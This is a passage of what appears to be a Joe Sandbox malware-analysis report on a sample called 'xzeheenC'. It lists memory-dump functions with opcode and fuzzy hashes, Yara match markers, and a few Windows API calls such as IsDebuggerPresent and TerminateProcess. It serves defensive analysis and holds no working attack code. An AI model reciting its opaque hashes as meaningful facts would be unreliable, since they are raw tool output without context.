                                                                                                                        • Opcode Fuzzy Hash: 5df071fa571d6934101e91af9c9e68ec11299d79629ef8eeac5c089ded2aa042
                                                                                                                        • Instruction Fuzzy Hash: 7241C575E01218CFDB68DFAAC9407DEBBF2BF89300F5080A9C418A7295DB345A85CF55
                                                                                                                        Function 20A8BEA8 Relevance: .1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 27cc97230859bc8dd4a37d4880283067f745099e7be6345094d4558612a496fd
                                                                                                                        • Instruction ID: 506f46ae7e3065f3fbfaabc9418ef6405ede46c88701577682f4f99b81da52d1
                                                                                                                        • Opcode Fuzzy Hash: 27cc97230859bc8dd4a37d4880283067f745099e7be6345094d4558612a496fd
                                                                                                                        • Instruction Fuzzy Hash: 9341E375E01218CFEB68CFAAD9507DEBBF2BF89300F5080AAC458A7255DB345A85CF51
                                                                                                                        Function 20AA2DC8 Relevance: .1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 183d2d534f4a2b31799cb15d1ad4b3e7e57d3abb1290c9729a6fb8c0c4f78400
                                                                                                                        • Instruction ID: d5c7dc5fb0a8ad6444960581a2c1db950573d43b1b819878bd6e3473039f9306
                                                                                                                        • Opcode Fuzzy Hash: 183d2d534f4a2b31799cb15d1ad4b3e7e57d3abb1290c9729a6fb8c0c4f78400
                                                                                                                        • Instruction Fuzzy Hash: 92318F352042599FCB068FB8D894AAF7FBAFB88310F604029F9059B380CB75DD65DB91
                                                                                                                        Function 1B1AD514 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465856985.000000001B1AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1ad000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c5533eec3e046b6cd097443fc4b236f5ab5c6ff7ac82f94fe1aa3ee315a19ace
                                                                                                                        • Instruction ID: 73deb6423c8b17f0520717f317cd61943d96eb38213e0629388dc72cd117cad2
                                                                                                                        • Opcode Fuzzy Hash: c5533eec3e046b6cd097443fc4b236f5ab5c6ff7ac82f94fe1aa3ee315a19ace
                                                                                                                        • Instruction Fuzzy Hash: 42216AB9500680DFCB01DF24DAC0F56BF75FB89318F61C169E8080B216C736E446CBA2
                                                                                                                        Function 1B1BD030 Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465984573.000000001B1BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1bd000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75c405ab8f961b389d597959e1173d3262b55c9f203bdefa391dcc55abc138dd
                                                                                                                        • Instruction ID: 8af0d1ae4982f09caa109e97a14acba3197de4e629b2d6e45853836d0802291d
                                                                                                                        • Opcode Fuzzy Hash: 75c405ab8f961b389d597959e1173d3262b55c9f203bdefa391dcc55abc138dd
                                                                                                                        • Instruction Fuzzy Hash: 2A21FFB1A04248DFCB08DF24DBC0F56BBB5EB88314F61C5A9D9494B256C33AD846CB62
                                                                                                                        Function 20A82220 Relevance: .1, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4401f31003ab33d7daf678c68cd4f048163ce7799026c58d7f2e06d7f86a766e
                                                                                                                        • Instruction ID: 58976c28939f17c5c2423cdd00e1adf4a9134ea137935cb624b2e4d4176c1349
                                                                                                                        • Opcode Fuzzy Hash: 4401f31003ab33d7daf678c68cd4f048163ce7799026c58d7f2e06d7f86a766e
                                                                                                                        • Instruction Fuzzy Hash: 59115A763002048FC704DFA9E584EA6B7EAFF88721B618569E54ACB771DB71EC05CB50
                                                                                                                        Function 20A827E0 Relevance: .1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3fdb772fcd02a624cc7c330668cba05b594fcb54605a283f3d14ca6e1ef186ab
                                                                                                                        • Instruction ID: 4c126d3621355d97f3e3246b22b9bacf24626f3b23cd3ba3a85570d8969f9065
                                                                                                                        • Opcode Fuzzy Hash: 3fdb772fcd02a624cc7c330668cba05b594fcb54605a283f3d14ca6e1ef186ab
                                                                                                                        • Instruction Fuzzy Hash: EF115E32E012198BCF10EFF984946AEBBF6AB48711F944539D419A3244DB31DD418BA1
                                                                                                                        Function 1B1AD50F Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465856985.000000001B1AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1ad000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                        • Instruction ID: 13c0869fb899c63cb785dbe3a98621e229340fd75a6fb506c9e2453cc4995a6a
                                                                                                                        • Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                        • Instruction Fuzzy Hash: C81126768042C0CFCB02CF10D6C0B46BF72FB88314F24C6A9D8494B616C336E45ACBA2
                                                                                                                        Function 20AA3EB0 Relevance: .1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 832cf14652da3e5bab7e3929aa84de5f54b6aac200305c173b8029f42fe26ea5
                                                                                                                        • Instruction ID: bf96070b5a424480bc70bcb2747def419986c6bbffa7ae7645e748997e9090f8
                                                                                                                        • Opcode Fuzzy Hash: 832cf14652da3e5bab7e3929aa84de5f54b6aac200305c173b8029f42fe26ea5
                                                                                                                        • Instruction Fuzzy Hash: DD01F5367582508FC3058B7DD8949597BF6AFCA52531500F6F145CF3B6EA60CC00C790
                                                                                                                        Function 1B1BD02B Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465984573.000000001B1BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1bd000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
                                                                                                                        • Instruction ID: a4a5fa9a0dbfd5d4dbcff0f6f130f34125a4777fc41c5af7dd4607ec6b2495b9
                                                                                                                        • Opcode Fuzzy Hash: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
                                                                                                                        • Instruction Fuzzy Hash: 64118B75904284DFDB06CF14D6C4B55BBB1FB88314F24C6AAD8494B656C33AD44ACB62
                                                                                                                        Function 20A825C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d636bef2cd7ff31c466393bf8a2806bc39c528bce50c9d0377dd3ba07b7e666d
                                                                                                                        • Instruction ID: 4db86ae8fc25f7a55ab28ad625e003ca4994bd27d7fe6adc4b5c5b29621a91ff
                                                                                                                        • Opcode Fuzzy Hash: d636bef2cd7ff31c466393bf8a2806bc39c528bce50c9d0377dd3ba07b7e666d
                                                                                                                        • Instruction Fuzzy Hash: 8F014E353443A41BDB061B78995457E3F9EEBC7320B0440BAED45CB287DE25CD168353
                                                                                                                        Function 20AA4401 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a56646f6362b305603b2f00642e10c35396e56adb66f60c2fa1be86dddb7bdb4
                                                                                                                        • Instruction ID: b381f8d3be052e5d08f76881f5dffa0461482ebbc487cc290c644b08db071dfc
                                                                                                                        • Opcode Fuzzy Hash: a56646f6362b305603b2f00642e10c35396e56adb66f60c2fa1be86dddb7bdb4
                                                                                                                        • Instruction Fuzzy Hash: 2001DEBAA10221CFC754DFB8D658A4E7BF8BF8C66531044A6E816D7312EB30CD018BA1
                                                                                                                        Function 1B1AD006 Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465856985.000000001B1AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1ad000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2cb929d57e8c0534501fe033b8c87a8ac107d140a1a46ac2c61d3062e2dc29fe
                                                                                                                        • Instruction ID: a9fcd4f65291e03a8a39734a8536805c5fdb8fd11e6d6277fbdadb1fa6c0d69d
                                                                                                                        • Opcode Fuzzy Hash: 2cb929d57e8c0534501fe033b8c87a8ac107d140a1a46ac2c61d3062e2dc29fe
                                                                                                                        • Instruction Fuzzy Hash: BD01696140D7C49FD7024B358E94692BFA8EF57220F0A84DBE9889F2A7C2696C45C772
                                                                                                                        Function 20A80FD8 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 76afb4e719a82d28ae10943aa3a620bcb76db6d3f7b7a7ca0f02e37687cc55a3
                                                                                                                        • Instruction ID: a764e6cbd130c77ca1d62535bcb7bee805fc50d66c0b775df5fbf1110ac25600
                                                                                                                        • Opcode Fuzzy Hash: 76afb4e719a82d28ae10943aa3a620bcb76db6d3f7b7a7ca0f02e37687cc55a3
                                                                                                                        • Instruction Fuzzy Hash: E1015235E00259DFDB549FB4D8585AF7BB9FB88360F00452AED5A93241DB318D11CBA1
                                                                                                                        Function 20AA3610 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a1164a52ec29408cd11bd567f4e92822b7f28d398dc01e0a5a9e3f4ae82be68
                                                                                                                        • Instruction ID: ce0059ec4e977f482d25c4bb15cb880714c91bde02929e6e37e728c401aa7164
                                                                                                                        • Opcode Fuzzy Hash: 6a1164a52ec29408cd11bd567f4e92822b7f28d398dc01e0a5a9e3f4ae82be68
                                                                                                                        • Instruction Fuzzy Hash: 150186727002587BDB058E999851AEF7BABDBC8650F548029F915D7380DA71DC119B90
                                                                                                                        Function 1B1AD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3465856985.000000001B1AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1B1AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1b1ad000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b187a003b419df9d84da99eda563c63658759065accc3df3b268fdaf6a7bde2
                                                                                                                        • Instruction ID: a817a7ed5b67f73be4f0bb93e83b8201c4cbcf8a742f17435ff4428369dbc654
                                                                                                                        • Opcode Fuzzy Hash: 0b187a003b419df9d84da99eda563c63658759065accc3df3b268fdaf6a7bde2
                                                                                                                        • Instruction Fuzzy Hash: E9012B75404B889FD3108B35CF84B97BFDCEF46721F15C429ED481B246C279A841C6B1
                                                                                                                        Function 20A80FC8 Relevance: .0, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a7867a55081976b0baeab4be530e2c68ccb635d35914eb94252f0f91fd0e0330
                                                                                                                        • Instruction ID: 54df2af0d9313ae7a72a30a37fe0b10ad4cf81d9ad25320123f20265ec0540da
                                                                                                                        • Opcode Fuzzy Hash: a7867a55081976b0baeab4be530e2c68ccb635d35914eb94252f0f91fd0e0330
                                                                                                                        • Instruction Fuzzy Hash: 7F015A76A002599FDB109FA4D8449AF7BB9FB98260F00413AE899D3241D7718D25DBA2
                                                                                                                        Function 20AA3600 Relevance: .0, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6b2008a9690fa9ec3666dee6967d27000800e0e2d61b461863d5fcadb06ff37
                                                                                                                        • Instruction ID: bd0b314b2f0845006222257e2379f3bb5e04c4505d066f5cfa5c82dfbbe5d1cd
                                                                                                                        • Opcode Fuzzy Hash: c6b2008a9690fa9ec3666dee6967d27000800e0e2d61b461863d5fcadb06ff37
                                                                                                                        • Instruction Fuzzy Hash: 4801D672600254AFDB058EA59C41BDF7BAAEF88750F148069FA14C7281C772C812DB90
                                                                                                                        Function 20A82877 Relevance: .0, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 91d8fe58ce28d9aca80501b87cfbe23d372f2707ad6d4de0a9183581eb7cd7d3
                                                                                                                        • Instruction ID: 2a0c53aa66f53e12fa6b8af6105b3cae4011d5e9ef63e19679ee5b84d03d6e41
                                                                                                                        • Opcode Fuzzy Hash: 91d8fe58ce28d9aca80501b87cfbe23d372f2707ad6d4de0a9183581eb7cd7d3
                                                                                                                        • Instruction Fuzzy Hash: BBF09633B086645FCB0657A9B4255AEBBE9DFC576071400BBE544D72A1CE62CC06C791
                                                                                                                        Function 20AA4378 Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 087706345f93007cdc7183b18bf499f105e989115152bc0f708eab37a4823d4b
                                                                                                                        • Instruction ID: 0dd08871ed3ae9104422300d9d932151a8581a689bba77053c785bd86169b582
                                                                                                                        • Opcode Fuzzy Hash: 087706345f93007cdc7183b18bf499f105e989115152bc0f708eab37a4823d4b
                                                                                                                        • Instruction Fuzzy Hash: 4B011970E003299FCF44DFB9C9546DEBBF5BF88200F50852AD919EB250E73899028FA1
                                                                                                                        Function 20A820B8 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cd844b01bd1f1fc999940e43ddc1d23106d8c2acdb907114d618fdae99341a1c
                                                                                                                        • Instruction ID: 98e583ebe02ce38340a8dafb999651c6f7002ea6557c91e9e6890021bbbf1edb
                                                                                                                        • Opcode Fuzzy Hash: cd844b01bd1f1fc999940e43ddc1d23106d8c2acdb907114d618fdae99341a1c
                                                                                                                        • Instruction Fuzzy Hash: 3AF0F6769002089E8B50DFA9D8419EFBBFAEF58350B50462ADA05D3211E6309A158BE1
                                                                                                                        Function 20A82570 Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e464eb2fad96ff6fe29552198d61b07499c8dae1f1165372f2cbafd0a83cc416
                                                                                                                        • Instruction ID: 555180d585a35a4b9a12d8e751dcec7d978712f8b60196f80d27c4b31ace58e5
                                                                                                                        • Opcode Fuzzy Hash: e464eb2fad96ff6fe29552198d61b07499c8dae1f1165372f2cbafd0a83cc416
                                                                                                                        • Instruction Fuzzy Hash: C2F03A353401059FC7048F59D494D6ABBAAFF88724B648069E90987331CB719C51CB50
                                                                                                                        Function 20AA3EC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 129bf7380cb58cb61c0445a66c6adf38f96378073d500e58048d65a4221cb431
                                                                                                                        • Instruction ID: a2ce5f0b8e6f424d973098c7adac48ec6fa733ae115aff7bd25e4a3416625d4f
                                                                                                                        • Opcode Fuzzy Hash: 129bf7380cb58cb61c0445a66c6adf38f96378073d500e58048d65a4221cb431
                                                                                                                        • Instruction Fuzzy Hash: CEF082367101118FC7489A6AD898D2A7BBAEFC66257544069F506CB3A5EE60DC018790
                                                                                                                        Function 20A82620 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 755b672ca091792bd03a64edaeb90a73b80a02902ceb3a40de92f84fb6d2d741
                                                                                                                        • Instruction ID: ea8e48d96da270a1c3bffd976c3b7439941dda0cac625e75e3546de33241ab4c
                                                                                                                        • Opcode Fuzzy Hash: 755b672ca091792bd03a64edaeb90a73b80a02902ceb3a40de92f84fb6d2d741
                                                                                                                        • Instruction Fuzzy Hash: 72D0C736300124678B051A4994448AE7B5FE7C9771705802AFD4583304CE724D2197E5
                                                                                                                        Function 20AA3DB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eecc10d3e4c7e1e4c2a9883f5c869cbb35c1b742ead0de3d821dcb71601b0e2c
                                                                                                                        • Instruction ID: 6ddf00d2d1dee9bccfd638df521663c1d5ca8f638d31b8fe92e05c4b3df4b900
                                                                                                                        • Opcode Fuzzy Hash: eecc10d3e4c7e1e4c2a9883f5c869cbb35c1b742ead0de3d821dcb71601b0e2c
                                                                                                                        • Instruction Fuzzy Hash: 9BC012340842194BC68AEB75E9C69557B1EFAC0214BA08A24E10E06169EFF8ED49C7D0
                                                                                                                        Function 20AA3E90 Relevance: .0, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5b74f2633cee37632b59b68bd87aae7ea879328f9dff4a4e1836441ec426afa5
                                                                                                                        • Instruction ID: f9dd07299643a207639900588955c9272653a6858f5ae2ce0c8dbb7efa725ca7
                                                                                                                        • Opcode Fuzzy Hash: 5b74f2633cee37632b59b68bd87aae7ea879328f9dff4a4e1836441ec426afa5
                                                                                                                        • Instruction Fuzzy Hash: BEC08C3C6043004FEF118B10E66CB41BBB1DF84304F0480A4D809CB266C320DC82C600

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                        Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                        Function 1F6EC0F0 Relevance: 1.9, Strings: 1, Instructions: 683COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
